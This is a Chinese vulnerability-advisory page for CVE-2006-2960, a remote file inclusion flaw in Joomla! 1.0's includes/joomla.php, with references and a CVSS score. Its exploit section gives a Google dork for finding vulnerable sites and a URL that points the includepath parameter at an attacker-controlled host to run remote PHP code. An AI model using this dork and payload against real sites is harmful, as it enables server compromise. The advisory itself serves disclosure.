Joomla! includes/joomla.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194590 漏洞类型 输入验证
发布时间 2006-06-12 更新时间 2006-10-30
CVE编号 CVE-2006-2960 CNNVD-ID CNNVD-200606-247
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006060079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-247
|漏洞详情
Joomla!1.0中的includes/joomla.php存在PHP远程文件包含漏洞,远程攻击者可通过在includepath参数内的URL执行任意PHP代码。
|漏洞EXP
Title:

Joomla Remote File Inclusion

Google Dork:

"Powered by Joomla! 1.0"

Credit:

Canberx

Exploit:

http://targetsite.com/[path_to_Joomla!]/includes/joomla.php?includepath=
[attacker]
|参考资料

来源:BID
名称:18363
链接:http://www.securityfocus.com/bid/18363
来源:BUGTRAQ
名称:20060610Joomla!1.0RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/436707/100/0/threaded
来源:SECTRACK
名称:1016269
链接:http://securitytracker.com/id?1016269
来源:XF
名称:joomla-php-file-include(27135)
链接:http://xforce.iss.net/xforce/xfdb/27135
来源:SREASON
名称:1074
链接:http://securityreason.com/securityalert/1074